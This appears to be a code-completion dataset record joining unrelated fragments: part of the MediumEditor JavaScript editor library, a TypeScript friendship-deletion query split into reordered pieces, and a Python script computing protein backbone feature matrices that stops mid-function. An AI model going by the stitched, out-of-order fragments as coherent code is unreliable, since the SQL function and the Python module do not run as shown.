this.hidePlaceholder(element);
},
handleBlur: function (event, element) {
// Update placeholder for element that lost focus
this.updatePlaceholder(element);
},
handleExternalInteraction: function () {
// Update all placeholders
this.initPlaceholders();
}
};
}());
var extensionDefaults;
(function () {
// for now this is empty because nothing internally uses an Extension default.
// as they are converted, provide them here.
extensionDefaults = {
paste: PasteHandler
};
})();
function MediumEditor(elements, options) {
'use strict';
return this.init(elements, options);
}
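// Illustrative usage of the constructor above (selector string plus options,
// both handled in init/createElementsArray below):
//   var editor = new MediumEditor('.editable', {
//       buttons: ['bold', 'italic', 'anchor'],
//       disableReturn: false
//   });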
(function () {
'use strict';
// Event handlers that shouldn't be exposed externally
function handleDisabledEnterKeydown(event, element) {
if (this.options.disableReturn || element.getAttribute('data-disable-return')) {
event.preventDefault();
} else if (this.options.disableDoubleReturn || element.getAttribute('data-disable-double-return')) {
var node = Util.getSelectionStart(this.options.ownerDocument);
if (node && node.textContent.trim() === '') {
event.preventDefault();
}
}
}
function handleTabKeydown(event) {
// Override tab only for pre nodes
var node = Util.getSelectionStart(this.options.ownerDocument),
tag = node && node.tagName.toLowerCase();
if (tag === 'pre') {
event.preventDefault();
Util.insertHTMLCommand(this.options.ownerDocument, ' ');
}
// Tab to indent list structures!
if (Util.isListItem(node)) {
event.preventDefault();
// If Shift is down, outdent, otherwise indent
if (event.shiftKey) {
this.options.ownerDocument.execCommand('outdent', false, null);
} else {
this.options.ownerDocument.execCommand('indent', false, null);
}
}
}
function handleBlockDeleteKeydowns(event) {
var range, sel, p, node = Util.getSelectionStart(this.options.ownerDocument),
tagName = node.tagName.toLowerCase(),
isEmpty = /^(\s+|<br\/?>)?$/i,
isHeader = /h\d/i;
if ((event.which === Util.keyCode.BACKSPACE || event.which === Util.keyCode.ENTER) &&
// has a preceding sibling
node.previousElementSibling &&
// in a header
isHeader.test(tagName) &&
// at the very end of the block
Selection.getCaretOffsets(node).left === 0) {
if (event.which === Util.keyCode.BACKSPACE && isEmpty.test(node.previousElementSibling.innerHTML)) {
// backspacing at the beginning of a header into an empty previous element
// would change the tagName of the current node; to prevent that, delete the
// previous node and cancel the event instead.
node.previousElementSibling.parentNode.removeChild(node.previousElementSibling);
event.preventDefault();
} else if (event.which === Util.keyCode.ENTER) {
// hitting return at the beginning of a header would create empty header elements before the current one
// instead, insert a "<p><br></p>" element, which is what happens if you hit return in an empty paragraph
p = this.options.ownerDocument.createElement('p');
p.innerHTML = '<br>';
node.previousElementSibling.parentNode.insertBefore(p, node);
event.preventDefault();
}
} else if (event.which === Util.keyCode.DELETE &&
// between two sibling elements
node.nextElementSibling &&
node.previousElementSibling &&
// not in a header
!isHeader.test(tagName) &&
// in an empty tag
isEmpty.test(node.innerHTML) &&
// when the next tag *is* a header
isHeader.test(node.nextElementSibling.tagName)) {
// hitting delete in an empty element preceding a header, ex:
// <p>[CURSOR]</p><h1>Header</h1>
// Will cause the h1 to become a paragraph.
// Instead, delete the paragraph node and move the cursor to the beginning of the h1
// remove node and move cursor to start of header
range = this.options.ownerDocument.createRange();
sel = this.options.ownerDocument.getSelection();
range.setStart(node.nextElementSibling, 0);
range.collapse(true);
sel.removeAllRanges();
sel.addRange(range);
node.previousElementSibling.parentNode.removeChild(node);
event.preventDefault();
} else if (event.which === Util.keyCode.BACKSPACE &&
tagName === 'li' &&
// hitting backspace inside an empty li
isEmpty.test(node.innerHTML) &&
// is first element (no preceding siblings)
!node.previousElementSibling &&
// parent also does not have a sibling
!node.parentElement.previousElementSibling &&
// is not the only li in a list
node.nextElementSibling.tagName.toLowerCase() === 'li') {
// backspacing in an empty first list element in the first list (with more elements) ex:
// <ul><li>[CURSOR]</li><li>List Item 2</li></ul>
// will remove the first <li> but add some extra element before (varies based on browser)
// Instead, this will:
// 1) remove the list element
// 2) create a paragraph before the list
// 3) move the cursor into the paragraph
// create a paragraph before the list
p = this.options.ownerDocument.createElement('p');
p.innerHTML = '<br>';
node.parentElement.parentElement.insertBefore(p, node.parentElement);
// move the cursor into the new paragraph
range = this.options.ownerDocument.createRange();
sel = this.options.ownerDocument.getSelection();
range.setStart(p, 0);
range.collapse(true);
sel.removeAllRanges();
sel.addRange(range);
// remove the list element
node.parentElement.removeChild(node);
event.preventDefault();
}
}
function handleDrag(event) {
var className = 'medium-editor-dragover';
event.preventDefault();
event.dataTransfer.dropEffect = 'copy';
if (event.type === 'dragover') {
event.target.classList.add(className);
} else if (event.type === 'dragleave') {
event.target.classList.remove(className);
}
}
function handleDrop(event) {
var className = 'medium-editor-dragover',
files;
event.preventDefault();
event.stopPropagation();
// IE9 does not support the File API, so prevent file from opening in a new window
// but also don't try to actually get the file
if (event.dataTransfer.files) {
files = Array.prototype.slice.call(event.dataTransfer.files, 0);
files.some(function (file) {
if (file.type.match('image')) {
var fileReader, id;
fileReader = new FileReader();
fileReader.readAsDataURL(file);
id = 'medium-img-' + (+new Date());
Util.insertHTMLCommand(this.options.ownerDocument, '<img class="medium-image-loading" id="' + id + '" />');
fileReader.onload = function () {
var img = this.options.ownerDocument.getElementById(id);
if (img) {
img.removeAttribute('id');
img.removeAttribute('class');
img.src = fileReader.result;
}
}.bind(this);
}
}.bind(this));
}
event.target.classList.remove(className);
}
function handleKeyup(event) {
var node = Util.getSelectionStart(this.options.ownerDocument),
tagName;
if (!node) {
return;
}
if (node.getAttribute('data-medium-element') && node.children.length === 0) {
this.options.ownerDocument.execCommand('formatBlock', false, 'p');
}
if (event.which === Util.keyCode.ENTER && !Util.isListItem(node)) {
tagName = node.tagName.toLowerCase();
// For anchor tags, unlink
if (tagName === 'a') {
this.options.ownerDocument.execCommand('unlink', false, null);
} else if (!event.shiftKey) {
// only format block if this is not a header tag
if (!/h\d/.test(tagName)) {
this.options.ownerDocument.execCommand('formatBlock', false, 'p');
}
}
}
}
// Internal helper methods which shouldn't be exposed externally
function createElementsArray(selector) {
if (!selector) {
selector = [];
}
// If string, use as query selector
if (typeof selector === 'string') {
selector = this.options.ownerDocument.querySelectorAll(selector);
}
// If element, put into array
if (Util.isElement(selector)) {
selector = [selector];
}
// Convert NodeList (or other array like object) into an array
var elements = Array.prototype.slice.apply(selector);
// Loop through elements and convert textarea's into divs
this.elements = [];
elements.forEach(function (element) {
if (element.tagName.toLowerCase() === 'textarea') {
this.elements.push(createContentEditable.call(this, element));
} else {
this.elements.push(element);
}
}, this);
}
function initExtension(extension, name, instance) {
if (extension.parent) {
extension.base = instance;
}
if (typeof extension.init === 'function') {
extension.init(instance);
}
if (!extension.name) {
extension.name = name;
}
return extension;
}
function shouldAddDefaultAnchorPreview() {
var i,
shouldAdd = false;
// If anchor-preview is disabled, don't add
if (this.options.disableAnchorPreview) {
return false;
}
// If anchor-preview extension has been overridden, don't add
if (this.options.extensions['anchor-preview']) {
return false;
}
// If toolbar is disabled, don't add
if (this.options.disableToolbar) {
return false;
}
// If all elements have 'data-disable-toolbar' attribute, don't add
for (i = 0; i < this.elements.length; i += 1) {
if (!this.elements[i].getAttribute('data-disable-toolbar')) {
shouldAdd = true;
break;
}
}
return shouldAdd;
}
function createContentEditable(textarea) {
var div = this.options.ownerDocument.createElement('div'),
id = (+new Date()),
attributesToClone = [
'data-disable-editing',
'data-disable-toolbar',
'data-placeholder',
'data-disable-return',
'data-disable-double-return',
'data-disable-preview',
'spellcheck'
];
div.className = textarea.className;
div.id = id;
div.innerHTML = textarea.value;
div.setAttribute('medium-editor-textarea-id', id);
attributesToClone.forEach(function (attr) {
if (textarea.hasAttribute(attr)) {
div.setAttribute(attr, textarea.getAttribute(attr));
}
});
textarea.classList.add('medium-editor-hidden');
textarea.setAttribute('medium-editor-textarea-id', id);
textarea.parentNode.insertBefore(
div,
textarea
);
return div;
}
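// Illustrative: given '<textarea class="post" data-placeholder="Write...">hi</textarea>',
// this creates a sibling '<div class="post" data-placeholder="Write...">hi</div>',
// links the two via a shared medium-editor-textarea-id attribute, and hides the
// original textarea through the medium-editor-hidden class.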
function initElements() {
this.elements.forEach(function (element) {
if (!this.options.disableEditing && !element.getAttribute('data-disable-editing')) {
element.setAttribute('contentEditable', true);
element.setAttribute('spellcheck', this.options.spellcheck);
}
if (!element.getAttribute('data-placeholder')) {
element.setAttribute('data-placeholder', this.options.placeholder);
}
element.setAttribute('data-medium-element', true);
element.setAttribute('role', 'textbox');
element.setAttribute('aria-multiline', true);
if (element.hasAttribute('medium-editor-textarea-id')) {
this.on(element, 'input', function (event) {
var target = event.target,
textarea = target.parentNode.querySelector('textarea[medium-editor-textarea-id="' + target.getAttribute('medium-editor-textarea-id') + '"]');
if (textarea) {
textarea.value = this.serialize()[target.id].value;
}
}.bind(this));
}
}, this);
}
function initToolbar() {
if (this.toolbar || this.options.disableToolbar) {
return false;
}
var addToolbar = this.elements.some(function (element) {
return !element.getAttribute('data-disable-toolbar');
});
if (addToolbar) {
this.toolbar = new Toolbar(this);
this.options.elementsContainer.appendChild(this.toolbar.getToolbarElement());
}
}
function attachHandlers() {
var i;
// attach to tabs
this.subscribe('editableKeydownTab', handleTabKeydown.bind(this));
// Bind keys which can create or destroy a block element: backspace, delete, return
this.subscribe('editableKeydownDelete', handleBlockDeleteKeydowns.bind(this));
this.subscribe('editableKeydownEnter', handleBlockDeleteKeydowns.bind(this));
// disabling return or double return
if (this.options.disableReturn || this.options.disableDoubleReturn) {
this.subscribe('editableKeydownEnter', handleDisabledEnterKeydown.bind(this));
} else {
for (i = 0; i < this.elements.length; i += 1) {
if (this.elements[i].getAttribute('data-disable-return') || this.elements[i].getAttribute('data-disable-double-return')) {
this.subscribe('editableKeydownEnter', handleDisabledEnterKeydown.bind(this));
break;
}
}
}
// if we're not disabling return, add a handler to help handle cleanup
// for certain cases when enter is pressed
if (!this.options.disableReturn) {
this.elements.forEach(function (element) {
if (!element.getAttribute('data-disable-return')) {
this.on(element, 'keyup', handleKeyup.bind(this));
}
}, this);
}
// drag and drop of images
if (this.options.imageDragging) {
this.subscribe('editableDrag', handleDrag.bind(this));
this.subscribe('editableDrop', handleDrop.bind(this));
}
}
function initPasteHandler(options) {
// Backwards compatibility
var defaultsBC = {
forcePlainText: this.options.forcePlainText, // deprecated
cleanPastedHTML: this.options.cleanPastedHTML, // deprecated
disableReturn: this.options.disableReturn,
targetBlank: this.options.targetBlank,
'window': this.options.contentWindow,
'document': this.options.ownerDocument
};
return new MediumEditor.extensions.paste(
Util.extend({}, options, defaultsBC)
);
}
function initCommands() {
var buttons = this.options.buttons,
extensions = this.options.extensions,
ext,
name;
this.commands = [];
buttons.forEach(function (buttonName) {
if (extensions[buttonName]) {
ext = initExtension(extensions[buttonName], buttonName, this);
this.commands.push(ext);
} else if (buttonName === 'anchor') {
ext = initExtension(new AnchorExtension(), buttonName, this);
this.commands.push(ext);
} else if (buttonName === 'fontsize') {
ext = initExtension(new FontSizeExtension(), buttonName, this);
this.commands.push(ext);
} else if (ButtonsData.hasOwnProperty(buttonName)) {
ext = new DefaultButton(ButtonsData[buttonName], this);
this.commands.push(ext);
}
}, this);
for (name in extensions) {
if (extensions.hasOwnProperty(name) && buttons.indexOf(name) === -1) {
ext = initExtension(extensions[name], name, this);
this.commands.push(ext);
}
}
// Only add default paste extension if it wasn't overridden
if (!this.options.extensions['paste']) {
this.commands.push(initExtension(initPasteHandler.call(this, this.options.paste), 'paste', this));
}
// Add AnchorPreview as extension if needed
if (shouldAddDefaultAnchorPreview.call(this)) {
this.commands.push(initExtension(new AnchorPreview(), 'anchor-preview', this));
}
}
function mergeOptions(defaults, options) {
// warn about using deprecated properties
if (options) {
[['forcePlainText', 'paste.forcePlainText'],
['cleanPastedHTML', 'paste.cleanPastedHTML']].forEach(function (pair) {
if (options.hasOwnProperty(pair[0]) && options[pair[0]] !== undefined) {
Util.deprecated(pair[0], pair[1], 'v5.0.0');
}
});
}
var nestedMerges = ['paste'],
tempOpts = Util.extend({}, options);
nestedMerges.forEach(function (toMerge) {
if (!tempOpts[toMerge]) {
tempOpts[toMerge] = defaults[toMerge];
} else {
tempOpts[toMerge] = Util.defaults({}, tempOpts[toMerge], defaults[toMerge]);
}
});
return Util.defaults(tempOpts, defaults);
}
function execActionInternal(action, opts) {
/*jslint regexp: true*/
var appendAction = /^append-(.+)$/gi,
match;
/*jslint regexp: false*/
// Actions starting with 'append-' should attempt to format a block of text ('formatBlock') using a specific
// type of block element (ie append-blockquote, append-h1, append-pre, etc.)
match = appendAction.exec(action);
if (match) {
return Util.execFormatBlock(this.options.ownerDocument, match[1]);
}
if (action === 'fontSize') {
return this.options.ownerDocument.execCommand('fontSize', false, opts.size);
}
if (action === 'createLink') {
return this.createLink(opts);
}
if (action === 'image') {
return this.options.ownerDocument.execCommand('insertImage', false, this.options.contentWindow.getSelection());
}
return this.options.ownerDocument.execCommand(action, false, null);
}
// deprecate
MediumEditor.statics = {
ButtonsData: ButtonsData,
DefaultButton: DefaultButton,
AnchorExtension: AnchorExtension,
FontSizeExtension: FontSizeExtension,
Toolbar: Toolbar,
AnchorPreview: AnchorPreview
};
MediumEditor.Extension = Extension;
MediumEditor.extensions = extensionDefaults;
MediumEditor.util = Util;
MediumEditor.selection = Selection;
MediumEditor.prototype = {
defaults: editorDefaults,
// NOT DOCUMENTED - exposed for backwards compatibility
init: function (elements, options) {
var uniqueId = 1;
this.options = mergeOptions.call(this, this.defaults, options);
createElementsArray.call(this, elements);
if (this.elements.length === 0) {
return;
}
if (!this.options.elementsContainer) {
this.options.elementsContainer = this.options.ownerDocument.body;
}
while (this.options.elementsContainer.querySelector('#medium-editor-toolbar-' + uniqueId)) {
uniqueId = uniqueId + 1;
}
this.id = uniqueId;
return this.setup();
},
setup: function () {
if (this.isActive) {
return;
}
this.events = new Events(this);
this.isActive = true;
// Call initialization helpers
initElements.call(this);
initCommands.call(this);
initToolbar.call(this);
attachHandlers.call(this);
if (!this.options.disablePlaceholders) {
this.placeholders = new Placeholders(this);
}
},
destroy: function () {
if (!this.isActive) {
return;
}
var i;
this.isActive = false;
if (this.toolbar !== undefined) {
this.toolbar.deactivate();
delete this.toolbar;
}
for (i = 0; i < this.elements.length; i += 1) {
this.elements[i].removeAttribute('contentEditable');
this.elements[i].removeAttribute('spellcheck');
this.elements[i].removeAttribute('data-medium-element');
}
this.commands.forEach(function (extension) {
if (typeof extension.deactivate === 'function') {
extension.deactivate();
}
}, this);
this.events.detachAllDOMEvents();
this.events.detachAllCustomEvents();
},
on: function (target, event, listener, useCapture) {
this.events.attachDOMEvent(target, event, listener, useCapture);
},
off: function (target, event, listener, useCapture) {
this.events.detachDOMEvent(target, event, listener, useCapture);
},
subscribe: function (event, listener) {
this.events.attachCustomEvent(event, listener);
},
unsubscribe: function (event, listener) {
this.events.detachCustomEvent(event, listener);
},
delay: function (fn) {
var self = this;
return setTimeout(function () {
if (self.isActive) {
fn();
}
}, this.options.delay);
},
serialize: function () {
var i,
elementid,
content = {};
for (i = 0; i < this.elements.length; i += 1) {
elementid = (this.elements[i].id !== '') ? this.elements[i].id : 'element-' + i;
content[elementid] = {
value: this.elements[i].innerHTML.trim()
};
}
return content;
},
getExtensionByName: function (name) {
var extension;
if (this.commands && this.commands.length) {
this.commands.some(function (ext) {
if (ext.name === name) {
extension = ext;
return true;
}
return false;
});
}
return extension;
},
/**
* NOT DOCUMENTED - exposed for backwards compatibility
* Helper function to call a method with a number of parameters on all registered extensions.
* It verifies that the function exists before calling it.
*
* @param {string} funcName name of the function to call
* @param [args] arguments passed into funcName
*/
callExtensions: function (funcName) {
if (arguments.length < 1) {
return;
}
var args = Array.prototype.slice.call(arguments, 1),
ext,
name;
for (name in this.options.extensions) {
if (this.options.extensions.hasOwnProperty(name)) {
ext = this.options.extensions[name];
if (ext[funcName] !== undefined) {
ext[funcName].apply(ext, args);
}
}
}
return this;
},
stopSelectionUpdates: function () {
this.preventSelectionUpdates = true;
},
startSelectionUpdates: function () {
this.preventSelectionUpdates = false;
},
// NOT DOCUMENTED - exposed as extension helper and for backwards compatibility
checkSelection: function () {
if (this.toolbar) {
this.toolbar.checkState();
}
return this;
},
// Wrapper around document.queryCommandState for checking whether an action has already
// been applied to the current selection
queryCommandState: function (action) {
var fullAction = /^full-(.+)$/gi,
match,
queryState = null;
// Actions starting with 'full-' need to be modified since this is a medium-editor concept
match = fullAction.exec(action);
if (match) {
action = match[1];
}
try {
queryState = this.options.ownerDocument.queryCommandState(action);
} catch (exc) {
queryState = null;
}
return queryState;
},
execAction: function (action, opts) {
/*jslint regexp: true*/
var fullAction = /^full-(.+)$/gi,
match,
result;
/*jslint regexp: false*/
// Actions starting with 'full-' should be applied to the entire contents of the editable element
// (ie full-bold, full-append-pre, etc.)
match = fullAction.exec(action);
if (match) {
// Store the current selection to be restored after applying the action
this.saveSelection();
// Select all of the contents before calling the action
this.selectAllContents();
result = execActionInternal.call(this, match[1], opts);
// Restore the previous selection
this.restoreSelection();
} else {
result = execActionInternal.call(this, action, opts);
}
// do some DOM clean-up for known browser issues after the action
if (action === 'insertunorderedlist' || action === 'insertorderedlist') {
Util.cleanListDOM(this.getSelectedParentElement());
}
this.checkSelection();
return result;
},
getSelectedParentElement: function (range) {
if (range === undefined) {
range = this.options.contentWindow.getSelection().getRangeAt(0);
}
return Selection.getSelectedParentElement(range);
},
// NOT DOCUMENTED - exposed as extension helper
hideToolbarDefaultActions: function () {
if (this.toolbar) {
this.toolbar.hideToolbarDefaultActions();
}
return this;
},
// NOT DOCUMENTED - exposed as extension helper and for backwards compatibility
setToolbarPosition: function () {
if (this.toolbar) {
this.toolbar.setToolbarPosition();
}
},
selectAllContents: function () {
var currNode = Selection.getSelectionElement(this.options.contentWindow);
if (currNode) {
// Move to the lowest descendant node that still selects all of the contents
while (currNode.children.length === 1) {
currNode = currNode.children[0];
}
this.selectElement(currNode);
}
},
selectElement: function (element) {
Selection.selectNode(element, this.options.ownerDocument);
var selElement = Selection.getSelectionElement(this.options.contentWindow);
if (selElement) {
this.events.focusElement(selElement);
}
},
// http://stackoverflow.com/questions/17678843/cant-restore-selection-after-html-modify-even-if-its-the-same-html
// Tim Down
// TODO: move to selection.js and clean up old methods there
exportSelection: function () {
var selectionState = null,
selection = this.options.contentWindow.getSelection(),
range,
preSelectionRange,
start,
editableElementIndex = -1;
if (selection.rangeCount > 0) {
range = selection.getRangeAt(0);
preSelectionRange = range.cloneRange();
// Find element current selection is inside
this.elements.some(function (el, index) {
if (el === range.startContainer || Util.isDescendant(el, range.startContainer)) {
editableElementIndex = index;
return true;
}
return false;
});
if (editableElementIndex > -1) {
preSelectionRange.selectNodeContents(this.elements[editableElementIndex]);
preSelectionRange.setEnd(range.startContainer, range.startOffset);
start = preSelectionRange.toString().length;
selectionState = {
start: start,
end: start + range.toString().length,
editableElementIndex: editableElementIndex
};
}
}
if (selectionState !== null && selectionState.editableElementIndex === 0) {
delete selectionState.editableElementIndex;
}
return selectionState;
},
saveSelection: function () {
this.selectionState = this.exportSelection();
},
// http://stackoverflow.com/questions/17678843/cant-restore-selection-after-html-modify-even-if-its-the-same-html
// Tim Down
// TODO: move to selection.js and clean up old methods there
importSelection: function (inSelectionState) {
if (!inSelectionState) {
return;
}
var editableElementIndex = inSelectionState.editableElementIndex === undefined ?
0 : inSelectionState.editableElementIndex,
selectionState = {
editableElementIndex: editableElementIndex,
start: inSelectionState.start,
end: inSelectionState.end
},
editableElement = this.elements[selectionState.editableElementIndex],
charIndex = 0,
range = this.options.ownerDocument.createRange(),
nodeStack = [editableElement],
node,
foundStart = false,
stop = false,
i,
sel,
nextCharIndex;
range.setStart(editableElement, 0);
range.collapse(true);
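// Walk the DOM depth-first over text nodes, translating the saved character
// offsets back into (node, offset) endpoints on the new range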
node = nodeStack.pop();
while (!stop && node) {
if (node.nodeType === 3) {
nextCharIndex = charIndex + node.length;
if (!foundStart && selectionState.start >= charIndex && selectionState.start <= nextCharIndex) {
range.setStart(node, selectionState.start - charIndex);
foundStart = true;
}
if (foundStart && selectionState.end >= charIndex && selectionState.end <= nextCharIndex) {
range.setEnd(node, selectionState.end - charIndex);
stop = true;
}
charIndex = nextCharIndex;
} else {
i = node.childNodes.length - 1;
while (i >= 0) {
nodeStack.push(node.childNodes[i]);
i -= 1;
}
}
if (!stop) {
node = nodeStack.pop();
}
}
sel = this.options.contentWindow.getSelection();
sel.removeAllRanges();
sel.addRange(range);
},
restoreSelection: function () {
this.importSelection(this.selectionState);
},
createLink: function (opts) {
var customEvent,
i;
if (opts.url && opts.url.trim().length > 0) {
this.options.ownerDocument.execCommand('createLink', false, opts.url);
if (this.options.targetBlank || opts.target === '_blank') {
Util.setTargetBlank(Util.getSelectionStart(this.options.ownerDocument));
}
if (opts.buttonClass) {
Util.addClassToAnchors(Util.getSelectionStart(this.options.ownerDocument), opts.buttonClass);
}
}
if (this.options.targetBlank || opts.target === '_blank' || opts.buttonClass) {
customEvent = this.options.ownerDocument.createEvent('HTMLEvents');
customEvent.initEvent('input', true, true, this.options.contentWindow);
for (i = 0; i < this.elements.length; i += 1) {
this.elements[i].dispatchEvent(customEvent);
}
}
},
// alias for setup - keeping for backwards compatibility
activate: function () {
Util.deprecatedMethod.call(this, 'activate', 'setup', arguments, 'v5.0.0');
},
// alias for destroy - keeping for backwards compatibility
deactivate: function () {
Util.deprecatedMethod.call(this, 'deactivate', 'destroy', arguments, 'v5.0.0');
},
cleanPaste: function (text) {
this.getExtensionByName('paste').cleanPaste(text);
},
pasteHTML: function (html, options) {
this.getExtensionByName('paste').pasteHTML(html, options);
}
};
}());
MediumEditor.version = (function (major, minor, revision) {
return {
major: parseInt(major, 10),
minor: parseInt(minor, 10),
revision: parseInt(revision, 10),
toString: function () {
return [major, minor, revision].join('.');
}
};
}).apply(this, ({
// grunt-bump looks for this:
'version': '4.7.0'
}).version.split('.'));
return MediumEditor;
}())); |
(function () {
'use strict'; |
_deleteFriendshipByFrienshipUuid.ts | export const _deleteFriendshipByFrienshipUuid = async( friendshipUuid: string, sql: any) => {
await sql`
DELETE from "Friendships" | `
return "OK"
} | WHERE "friendshipUuid" = ${friendshipUuid} |
make_bb_info_mats.py | from numpy.core.numeric import full
from numpy.lib.function_base import append
import prody as pr
import os
import numpy
import matplotlib as mpl
import pylab
from itertools import combinations, combinations_with_replacement
from docopt import docopt
import itertools
import pickle
import sys
from scipy.linalg.basic import matrix_balance
from scipy.spatial.distance import cdist
from . import ligand_database as ld
from . import features_pdb2dihe as fpdh
metal_sel = 'ion or name NI MN ZN CO CU MG FE'
# TODO: create an artificial aa as the 4th aa.
def get_atg(full_pdb):
'''
A ProDy AtomGroup is used to calculate the backbone info.
If a contact aa is at a terminus, the shape of the dist matrix will be < 12, so the contact aa is copied and added.
'''
metal = full_pdb.select(metal_sel)[0]
contact_aas = full_pdb.select('protein and not carbon and not hydrogen and within 2.83 of resindex ' + str(metal.getResindex()))
contact_aa_resinds = numpy.unique(contact_aas.getResindices())
extension = 1
coords = []
resnames = []
names = []
resnums = []
resn = 1
for resind in contact_aa_resinds:
ext_inds = ld.extend_res_indices([resind], full_pdb, extend=extension)
# In some cases, the contact aa is at a terminus. We can add more aa to match the shape.
if len(ext_inds) == 2:
if ext_inds[0] == resind:
ext_inds.insert(0, resind)
else:
ext_inds.append(resind)
if len(ext_inds) == 1:
ext_inds.append(resind)
ext_inds.append(resind)
for ind in ext_inds:
aa = full_pdb.select('resindex ' + str(ind))
coords.extend(aa.getCoords())
resnames.extend(aa.getResnames())
names.extend(aa.getNames())
resnums.extend([resn for _i in range(len(aa))])
resn += 1
if len(contact_aa_resinds) == 3:
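# TODO placeholder (see note at the top of this module): an artificial 4th aa
# should be appended here; these extends are currently no-ops.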
coords.extend([])
resnames.extend([])
names.extend([])
resnums.extend([])
#ag = pr.AtomGroup('-'.join([str(p) for p in per]))
ag = pr.AtomGroup('0-1-2-3')
ag.setCoords(coords)
ag.setResnums(resnums)
ag.setResnames(resnames)
ag.setNames(names)
return ag
def get_atgs(full_pdb, contain_metal = True):
'''
A ProDy AtomGroup is used to calculate the backbone info.
If a contact aa is at a terminus, the shape of the dist matrix will be < 12, so the contact aa is copied and added.
'''
if contain_metal:
metal = full_pdb.select(metal_sel)[0]
contact_aas = full_pdb.select('protein and not carbon and not hydrogen and within 2.83 of resindex ' + str(metal.getResindex()))
else:
# TODO: this is not quite right if the pdb happens to have more than four HIS/CYS/GLU/ASP residues. Skipped for now.
contact_aas = full_pdb.select('resname HIS CYS GLU ASP')
if contact_aas is None or len(numpy.unique(contact_aas.getResindices())) > 4:
return []
contact_aa_resinds = numpy.unique(contact_aas.getResindices())
extension = 1
# TODO: If the len of contact_aas is not 4...
ags = []
#for per in itertools.permutations(range(len(contact_aa_resinds))):
for per in [range(len(contact_aa_resinds))]:
print(per)
coords = []
resnames = []
names = []
resnums = []
resn = 1
for idx in per:
resind = contact_aa_resinds[idx]
ext_inds = ld.extend_res_indices([resind], full_pdb, extend=extension)
# In some cases, the contact aa is at a terminus. We can add more aa to match the shape.
if len(ext_inds) == 2:
if ext_inds[0] == resind:
ext_inds.insert(0, resind)
else:
ext_inds.append(resind)
if len(ext_inds) == 1:
ext_inds.append(resind)
ext_inds.append(resind)
for ind in ext_inds:
aa = full_pdb.select('resindex ' + str(ind))
coords.extend(aa.getCoords())
resnames.extend(aa.getResnames())
names.extend(aa.getNames())
resnums.extend([resn for _i in range(len(aa))])
resn += 1
ag = pr.AtomGroup('-'.join([str(p) for p in per]))
ag.setCoords(coords)
ag.setResnums(resnums)
ag.setResnames(resnames)
ag.setNames(names)
ags.append(ag)
return ags
def get_bb_dist_seq(core):
'''
If we know N, CA, and C, the coords of CB can be calculated, so we may not need the CB coords.
'''
n_coords = core.select('name N').getCoords()
c_coords = core.select('name C').getCoords()
ca_coords = core.select('name CA').getCoords()
n_n = cdist(n_coords, n_coords)
c_c = cdist(c_coords, c_coords)
ca_ca = cdist(ca_coords, ca_coords)
cb_coords = []
for i in range(len(n_coords)):
Ca = ca_coords[i]
C = c_coords[i]
N = n_coords[i]
b = Ca - N
c = C - Ca
a = numpy.cross(b, c)
Cb = -0.58273431*a + 0.56802827*b - 0.54067466*c + Ca
cb_coords.append(Cb)
# cb_coords = core.select('name CB').getCoords()  # would discard the reconstructed
# coords above and would miss GLY residues, which have no CB atom
cb_cb = cdist(cb_coords, cb_coords)
return n_n, c_c, ca_ca, cb_cb
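# Illustrative sketch (not part of the original pipeline): the pseudo-CB
# reconstruction used above, applied to hypothetical N/CA/C coordinates for a
# single residue. The constants are the same empirical values as in get_bb_dist_seq.
def _example_pseudo_cb():
    N = numpy.array([1.458, 0.0, 0.0])
    Ca = numpy.array([0.0, 0.0, 0.0])
    C = numpy.array([-0.55, 1.42, 0.0])
    b = Ca - N
    c = C - Ca
    a = numpy.cross(b, c)
    # returns the approximate CB position implied by idealized backbone geometry
    return -0.58273431 * a + 0.56802827 * b - 0.54067466 * c + Ca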
def get_dihe(ag):
'''
Please check features_pdb2dihe.py.
Only the contact aa will be extracted.
'''
nres = len(ag.select('name CA'))
print(nres)
dist, _omega, _theta_asym, _phi_asym = fpdh.get_neighbors(ag, nres, 20.0)
#TO DO: extract info, only the contact aa matters?!
omega = numpy.zeros((nres, nres))
theta_asym = numpy.zeros((nres, nres))
phi_asym = numpy.zeros((nres, nres))
for i in range(1, nres, 3):
for j in range(1, nres, 3):
omega[i, j] = _omega[i, j]
theta_asym[i, j] = _theta_asym[i, j]
phi_asym[i, j] = _phi_asym[i, j]
return omega, theta_asym, phi_asym
def get_seq_mat(ag, matrix_size = 12):
seq = ag.select('name CA').getResnames()
threelettercodes = ['ALA', 'ARG', 'ASN', 'ASP', 'CYS', 'GLU', 'GLN', 'GLY', 'HIS', 'ILE', 'LEU', 'LYS', 'MET',\
'PHE', 'PRO', 'SER', 'THR', 'TRP', 'TYR', 'VAL']
seq_channels = numpy.zeros([40, matrix_size, matrix_size], dtype=int)
for i in range(len(seq)):
aa = seq[i]
try:
idx = threelettercodes.index(aa)
except ValueError:
print('Resname of following atom not found: {}'.format(aa))
continue
for j in range(len(seq)):
seq_channels[idx][i][j] = 1 # horizontal rows of 1's in first 20 channels
seq_channels[idx+20][j][i] = 1 # vertical columns of 1's in next 20 channels
return seq_channels
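# Minimal sketch (hypothetical two-residue core, shortened code list) of the
# one-hot layout get_seq_mat produces: channel idx carries horizontal rows of
# 1's for a residue, channel idx + 20 carries the matching vertical columns.
def _example_seq_channels(matrix_size=4):
    seq = ['ALA', 'CYS']
    codes = ['ALA', 'ARG', 'ASN', 'ASP', 'CYS']  # first few codes, for brevity
    channels = numpy.zeros([2 * len(codes), matrix_size, matrix_size], dtype=int)
    for i, aa in enumerate(seq):
        idx = codes.index(aa)
        for j in range(len(seq)):
            channels[idx][i][j] = 1               # horizontal row block
            channels[idx + len(codes)][j][i] = 1  # vertical column block
    return channels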
def mk_full_mats(ag, matrix_size = 12):
nres = len(ag.select('name CA'))
n_n, c_c, ca_ca, cb_cb = get_bb_dist_seq(ag)
omega, theta_asym, phi_asym = get_dihe(ag)
seq_mats = get_seq_mat(ag, matrix_size)
full_mat = numpy.zeros((47, matrix_size, matrix_size))
# Make sure the shape of each matrix is smaller than the matrix_size.
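# Channel layout: 0-3 backbone distance maps (N-N, C-C, CA-CA, CB-CB),
# 4-6 dihedral maps (omega, theta_asym, phi_asym), 7-46 sequence one-hot channels.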
full_mat[0,0:n_n.shape[0], 0:n_n.shape[1]] = n_n
full_mat[1,0:c_c.shape[0], 0:c_c.shape[1]] = c_c
full_mat[2,0:ca_ca.shape[0], 0:ca_ca.shape[1]] = ca_ca
full_mat[3,0:cb_cb.shape[0], 0:cb_cb.shape[1]] = cb_cb
full_mat[4,0:omega.shape[0], 0:omega.shape[1]] = omega
full_mat[5,0:theta_asym.shape[0], 0:theta_asym.shape[1]] = theta_asym
